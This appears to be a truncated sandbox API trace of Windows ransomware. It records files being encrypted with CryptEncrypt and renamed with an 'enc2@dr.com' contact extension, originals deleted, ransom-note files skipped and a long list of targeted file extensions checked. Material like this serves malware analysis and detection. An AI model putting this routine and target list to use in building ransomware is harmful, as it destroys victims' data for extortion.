	[0199.350] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.351] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x62ef, dwBufLen=0x62ef | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x62f0) returned 1
	[0199.352] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.352] RtlMoveMemory (in: Destination=0xfe3478, Source=0xfdd180, Length=0x62ef | out: Destination=0xfe3478) 
	[0199.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.352] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3478*, pdwDataLen=0x18bc0c*=0x62ef, dwBufLen=0x62f0 | out: pbData=0xfe3478*, pdwDataLen=0x18bc0c*=0x62f0) returned 1
	[0199.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.353] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0199.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.353] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0199.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.353] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0199.353] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.353] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.354] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0199.355] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 94
	[0199.355] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0199.356] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe3478*, nNumberOfBytesToWrite=0x62f0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe3478*, lpNumberOfBytesWritten=0x18c068*=0x62f0, lpOverlapped=0x0) returned 1
	[0199.362] CloseHandle (hObject=0x2c0) returned 1
	[0199.362] CloseHandle (hObject=0x384) returned 1
	[0199.362] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf")) returned 1
	[0199.368] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf")) returned 0
	[0199.368] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x88c13ec0, ftLastAccessTime.dwHighDateTime=0x1d972a0, ftLastWriteTime.dwLowDateTime=0x88c13ec0, ftLastWriteTime.dwHighDateTime=0x1d972a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9irupr75kfHemEUcFkFJ", cAlternateFileName="9IRUPR~1")) returned 1
	[0199.368] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0199.368] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0199.368] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0199.369] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.369] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini"
	[0199.369] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini") returned 40
	[0199.369] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.369] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini", cchLength=0x28 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini") returned 0x28
	[0199.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.369] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.370] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini"
	[0199.370] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini") returned 40
	[0199.370] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.370] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0199.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.371] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0199.371] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891f52b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891f52b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8921b425, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0199.371] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0199.371] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0199.371] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.371] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0199.371] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0199.371] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.372] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.html") returned 0x39
	[0199.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0199.372] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891a8d32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891f52b2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0199.372] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0199.372] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0199.372] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.372] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0199.373] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0199.373] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.373] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.txt") returned 0x38
	[0199.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0199.373] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe474e0, ftCreationTime.dwHighDateTime=0x1d97673, ftLastAccessTime.dwLowDateTime=0x74d020c0, ftLastAccessTime.dwHighDateTime=0x1d97692, ftLastWriteTime.dwLowDateTime=0x74d020c0, ftLastWriteTime.dwHighDateTime=0x1d97692, nFileSizeHigh=0x0, nFileSizeLow=0xfb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nsj6MwTA.swf", cAlternateFileName="")) returned 1
	[0199.373] lstrcmpW (lpString1="Nsj6MwTA.swf", lpString2="..") returned 1
	[0199.373] lstrcmpW (lpString1="Nsj6MwTA.swf", lpString2=".") returned 1
	[0199.373] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.374] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="Nsj6MwTA.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\Nsj6MwTA.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\Nsj6MwTA.swf"
	[0199.374] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\Nsj6MwTA.swf") returned 41
	[0199.374] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.374] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\Nsj6MwTA.swf", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf") returned 0x29
	[0199.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.374] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.374] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf"
	[0199.374] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\nsj6mwta.swf") returned 41
	[0199.375] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.375] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0199.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.375] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.